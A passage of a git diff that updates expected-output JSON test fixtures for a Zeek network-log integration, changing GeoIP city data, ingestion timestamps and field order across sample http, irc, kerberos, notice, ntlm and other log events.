@@ -534,28 +544,6 @@ }, "session_id": "C6oCGd24yB2dZ7y7z7" }, - "source": { - "port": 42164, - "address": "10.156.0.2", - "ip": "10.156.0.2" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:BZ8++u2MIGSTzB1PMApm+Z7ySCw=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T05:16:04.250Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "http": { "request": { "body": { @@ -570,8 +558,13 @@ "status_code": 200 } }, + "source": { + "port": 42164, + "address": "10.156.0.2", + "ip": "10.156.0.2" + }, "event": { - "ingested": "2021-12-09T13:51:01.993445300Z", + "ingested": "2021-12-14T14:59:13.505269315Z", "original": "{\"ts\":1617081364.250251,\"uid\":\"C6oCGd24yB2dZ7y7z7\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42164,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"F1imAq4yUjbwyK7NO2\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -586,20 +579,37 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:BZ8++u2MIGSTzB1PMApm+Z7ySCw=", + "transport": "tcp" } }, { + "@timestamp": "2021-03-30T05:16:06.285Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -626,28 +636,6 @@ }, "session_id": "C7DWRE1zsvxUK9RyW1" }, - "source": { - "port": 42292, - "address": "10.156.0.2", - "ip": "10.156.0.2" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:ajUcq0AI8azqE0a1li4/jRMwcKw=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T05:16:06.285Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "http": { "request": { "body": { @@ -662,8 +650,13 @@ "status_code": 200 } }, + "source": { + "port": 42292, + "address": "10.156.0.2", + "ip": "10.156.0.2" + }, "event": { - "ingested": "2021-12-09T13:51:01.993451200Z", + "ingested": "2021-12-14T14:59:13.505269690Z", "original": "{\"ts\":1617081366.285075,\"uid\":\"C7DWRE1zsvxUK9RyW1\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":42292,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"version\":\"1.0\",\"request_body_len\":0,\"response_body_len\":503,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FQhm6z1cISaOxMzzR6\"],\"resp_mime_types\":[\"application/ocsp-response\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -678,6 +671,13 @@ "info" ], "outcome": "success" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:ajUcq0AI8azqE0a1li4/jRMwcKw=", + "transport": "tcp" } }, { @@ -689,14 +689,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -769,7 +769,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:01.993457100Z", + "ingested": "2021-12-14T14:59:13.505270153Z", "original": "{\"ts\":1547707019.757479,\"uid\":\"CMnIaR2V8VXyu7EPs\",\"id.orig_h\":\"10.20.8.197\",\"id.orig_p\":35684,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":80,\"trans_depth\":1,\"method\":\"GET\",\"host\":\"httpbin.org\",\"uri\":\"/ip\",\"version\":\"1.1\",\"user_agent\":\"curl/7.58.0\",\"request_body_len\":0,\"response_body_len\":32,\"status_code\":200,\"status_msg\":\"OK\",\"tags\":[],\"resp_fuids\":[\"FwGPlr1GcKUWWdkXoi\"],\"resp_mime_types\":[\"text/json\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json index a51a678157a..aa3f703054d 100644 --- a/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json +++ b/packages/zeek/data_stream/intel/_dev/test/pipeline/test-intel.log-expected.json @@ -14,14 +14,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -57,7 +57,7 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-12-09T13:51:03.233040Z", + "ingested": "2021-12-14T14:59:14.764628555Z", "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"seen.indicator\":\"89.160.20.156\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "enrichment", @@ -74,22 +74,35 @@ ] }, { + "@timestamp": "2019-11-06T09:03:00.989Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.1.1", + "89.160.20.156" + ] + }, "log": { "file": { "path": "/usr/local/var/log/zeek/intel.log" } }, + "host": { + "name": "Lees-MBP.localdomain" + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -124,24 +137,8 @@ "address": "192.168.1.1", "ip": "192.168.1.1" }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2019-11-06T09:03:00.989Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.1.1", - "89.160.20.156" - ] - }, - "host": { - "name": "Lees-MBP.localdomain" - }, "event": { - "ingested": "2021-12-09T13:51:03.233049400Z", + "ingested": "2021-12-14T14:59:14.764631321Z", "original": "{\"ts\":1573030980.989353,\"uid\":\"Ctefoj1tgOPt4D0EK2\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":37598,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"seen.indicator\":\"89.160.20.156\",\"seen.indicator_type\":\"Intel::ADDR\",\"seen.where\":\"Conn::IN_RESP\",\"seen.node\":\"worker-1-2\",\"matched\":[\"Intel::ADDR\"],\"sources\":[\"ETPRO Rep: AbusedTLD Score: 127\"]}", "created": "2020-04-28T11:07:58.223Z", "kind": "enrichment", @@ -152,7 +149,10 @@ "type": [ "indicator" ] - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json index 21d6fe1ad5a..4e436885535 100644 --- a/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json +++ b/packages/zeek/data_stream/irc/_dev/test/pipeline/test-irc.log-expected.json @@ -14,14 +14,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -48,7 +48,7 @@ "ip": "10.180.156.249" }, "event": { - "ingested": "2021-12-09T13:51:03.580323700Z", + "ingested": "2021-12-14T14:59:15.317358074Z", "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"command\":\"USER\",\"value\":\"xxxxx\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -73,17 +73,30 @@ } }, { + "@timestamp": "2013-12-20T15:44:10.647Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "xxxxx" + ], + "ip": [ + "10.180.156.249", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -109,29 +122,8 @@ "address": "10.180.156.249", "ip": "10.180.156.249" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "irc", - "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", - "transport": "tcp" - }, - "@timestamp": "2013-12-20T15:44:10.647Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "xxxxx" - ], - "ip": [ - "10.180.156.249", - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:03.580332Z", + "ingested": "2021-12-14T14:59:15.317360396Z", "original": "{\"ts\":1387554250.647295,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"user\":\"xxxxx\",\"command\":\"NICK\",\"value\":\"molochtest\",\"addl\":\"+iw xxxxx XxxxxxXxxx \"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -148,20 +140,41 @@ }, "user": { "name": "xxxxx" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "irc", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", + "transport": "tcp" } }, { + "@timestamp": "2013-12-20T15:44:10.706Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "xxxxx" + ], + "ip": [ + "10.180.156.249", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -188,29 +201,8 @@ "address": "10.180.156.249", "ip": "10.180.156.249" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "irc", - "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", - "transport": "tcp" - }, - "@timestamp": "2013-12-20T15:44:10.706Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "xxxxx" - ], - "ip": [ - "10.180.156.249", - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:03.580337700Z", + "ingested": "2021-12-14T14:59:15.317360873Z", "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -227,6 +219,14 @@ }, "user": { "name": "xxxxx" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "irc", + "community_id": "1:oWOMkezEO9H3BbziJu3FkOaiAsQ=", + "transport": "tcp" } }, { 
@@ -238,14 +238,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -297,7 +297,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:03.580343100Z", + "ingested": "2021-12-14T14:59:15.317361261Z", "original": "{\"ts\":1387554250.706387,\"uid\":\"CNJBX5FQdL62VUUP1\",\"id.orig_h\":\"10.180.156.249\",\"id.orig_p\":45921,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8000,\"nick\":\"molochtest\",\"user\":\"xxxxx\",\"command\":\"JOIN\",\"value\":\"#moloch-fpc\",\"addl\":\" with channel key: \\u0027-\\u0027\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json index c88fababaac..f5115a35edd 100644 --- a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json +++ b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json 
@@ -86,7 +86,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:04.150192Z", + "ingested": "2021-12-14T14:59:15.886676516Z", "original": "{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true,\"cert.client_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"cert.server_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -201,7 +201,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:04.150196600Z", + "ingested": "2021-12-14T14:59:15.886679156Z", "original": "{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true,\"cert.client_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"cert.server_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json b/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json index 75a6af9f1ea..e8c46617ee2 100644 --- a/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json +++ b/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json 
@@ -28,7 +28,7 @@ "ip": "192.168.1.10" }, "event": { - "ingested": "2021-12-09T13:51:04.835055300Z", + "ingested": "2021-12-14T14:59:16.556760321Z", "original": "{\"ts\":1352718265.222457,\"uid\":\"CpIIXl4DFGswmjH2bl\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":64342,\"id.resp_h\":\"192.168.1.164\",\"id.resp_p\":502,\"func\":\"READ_COILS\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -96,7 +96,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:04.835060100Z", + "ingested": "2021-12-14T14:59:16.556763150Z", "original": "{\"ts\":1352718265.222457,\"uid\":\"CpIIXl4DFGswmjH2bl\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":64342,\"id.resp_h\":\"192.168.1.164\",\"id.resp_p\":502,\"func\":\"READ_COILS\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json b/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json index 5c5b27bc714..b279f9757da 100644 --- a/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json +++ b/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json @@ -30,7 +30,7 @@ "ip": "192.168.0.254" }, "event": { - "ingested": "2021-12-09T13:51:05.144926100Z", + "ingested": "2021-12-14T14:59:16.914011008Z", "original": "{\"ts\":1216281087.437392,\"uid\":\"C5Hol527kLMUw36hj3\",\"id.orig_h\":\"192.168.0.254\",\"id.orig_p\":56162,\"id.resp_h\":\"192.168.0.254\",\"id.resp_p\":3306,\"cmd\":\"query\",\"arg\":\"select count(*) from foo\",\"success\":true,\"rows\":1}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -102,7 +102,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:05.144933200Z", + "ingested": "2021-12-14T14:59:16.914013623Z", "original": "{\"ts\":1216281087.437392,\"uid\":\"C5Hol527kLMUw36hj3\",\"id.orig_h\":\"192.168.0.254\",\"id.orig_p\":56162,\"id.resp_h\":\"192.168.0.254\",\"id.resp_p\":3306,\"cmd\":\"query\",\"arg\":\"select count(*) from foo\",\"success\":true,\"rows\":1}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json index 491f17eabb2..21588b8c1f5 100644 --- a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json +++ b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json @@ -32,7 +32,7 @@ "ip": "172.16.238.1" }, "event": { - "ingested": "2021-12-09T13:51:05.490792100Z", + "ingested": "2021-12-14T14:59:17.264456746Z", "original": "{\"ts\":1320435875.879278,\"note\":\"SSH::Password_Guessing\",\"msg\":\"172.16.238.1 appears to be guessing SSH passwords (seen in 30 connections).\",\"sub\":\"Sampled servers: 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136\",\"src\":\"172.16.238.1\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" @@ -61,14 +61,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -100,14 +100,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -120,7 +120,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:51:05.490800300Z", + "ingested": "2021-12-14T14:59:17.264458920Z", "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s\",\"sub\":\"remote\",\"src\":\"89.160.20.156\",\"dst\":\"89.160.20.156\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" @@ -156,7 +156,7 @@ "description": "The capture loss script detected an estimated loss rate above 88.306%" }, "event": { - "ingested": "2021-12-09T13:51:05.490806100Z", + "ingested": "2021-12-14T14:59:17.264459402Z", "original": "{\"ts\":1617097740.958466,\"note\":\"CaptureLoss::Too_Much_Loss\",\"msg\":\"The capture loss script detected an estimated loss rate above 88.306%\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0}", "category": [ "intrusion_detection" @@ -172,17 +172,27 @@ ] }, { + "@timestamp": "2021-03-30T09:52:09.601Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.156.0.2", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -218,25 +228,8 @@ "address": "10.156.0.2", "ip": "10.156.0.2" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Dff30r1qWk7lVgWVwXvU4AAuxU8=", - "transport": "tcp" - }, - "@timestamp": "2021-03-30T09:52:09.601Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.156.0.2", - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:05.490811700Z", + "ingested": "2021-12-14T14:59:17.264459785Z", "original": "{\"ts\":1617097929.601155,\"uid\":\"CmvrSS1wIiuOGYCbfi\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":48818,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"fuid\":\"F39b0Bdfm3FW1rNS5\",\"proto\":\"tcp\",\"note\":\"SSL::Invalid_Server_Cert\",\"msg\":\"SSL certificate validation failed with (self signed certificate)\",\"sub\":\"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US\",\"src\":\"10.156.0.2\",\"dst\":\"89.160.20.156\",\"p\":443,\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -247,6 +240,13 @@ "type": [ "info" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Dff30r1qWk7lVgWVwXvU4AAuxU8=", + "transport": "tcp" } }, { @@ -258,14 +258,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -297,14 +297,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -332,7 +332,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:05.490817200Z", + "ingested": "2021-12-14T14:59:17.264460130Z", "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s\",\"sub\":\"remote\",\"src\":\"89.160.20.156\",\"dst\":\"89.160.20.156\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" diff --git a/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json b/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json index 5b7004c6c83..82fe1cde54b 100644 --- a/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json +++ b/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json @@ -1,6 +1,19 @@ { "expected": [ { + "@timestamp": "2017-10-25T19:18:37.814Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "JeffV" + ], + "ip": [ + "192.168.10.50", + "192.168.10.31" + ] + }, "destination": { "port": 445, "address": "192.168.10.31", 
@@ -26,29 +39,8 @@ "address": "192.168.10.50", "ip": "192.168.10.50" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "ntlm", - "community_id": "1:zxnXAE/Cme5fQhh6sJLs7GItc08=", - "transport": "tcp" - }, - "@timestamp": "2017-10-25T19:18:37.814Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "JeffV" - ], - "ip": [ - "192.168.10.50", - "192.168.10.31" - ] - }, "event": { - "ingested": "2021-12-09T13:51:06.115477800Z", + "ingested": "2021-12-14T14:59:17.857033520Z", "original": "{\"ts\":1508959117.814467,\"uid\":\"CHphiNUKDC20fsy09\",\"id.orig_h\":\"192.168.10.50\",\"id.orig_p\":46785,\"id.resp_h\":\"192.168.10.31\",\"id.resp_p\":445,\"username\":\"JeffV\",\"hostname\":\"ybaARon55QykXrgu\",\"domainname\":\"contoso.local\",\"server_nb_computer_name\":\"VICTIM-PC\",\"server_dns_computer_name\":\"Victim-PC.contoso.local\",\"server_tree_name\":\"contoso.local\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -65,6 +57,14 @@ "user": { "name": "JeffV", "domain": "contoso.local" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "ntlm", + "community_id": "1:zxnXAE/Cme5fQhh6sJLs7GItc08=", + "transport": "tcp" } }, { @@ -123,7 +123,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:06.115485200Z", + "ingested": "2021-12-14T14:59:17.857036252Z", "original": "{\"ts\":1508959117.814467,\"uid\":\"CHphiNUKDC20fsy09\",\"id.orig_h\":\"192.168.10.50\",\"id.orig_p\":46785,\"id.resp_h\":\"192.168.10.31\",\"id.resp_p\":445,\"username\":\"JeffV\",\"hostname\":\"ybaARon55QykXrgu\",\"domainname\":\"contoso.local\",\"server_nb_computer_name\":\"VICTIM-PC\",\"server_dns_computer_name\":\"Victim-PC.contoso.local\",\"server_tree_name\":\"contoso.local\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
diff --git a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json index d396a03c1e0..ec5cd75bf1e 100644 --- a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json +++ b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json @@ -13,14 +13,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -54,14 +54,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -75,7 +75,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:51:06.504150200Z", + "ingested": "2021-12-14T14:59:18.281284207Z", "original": 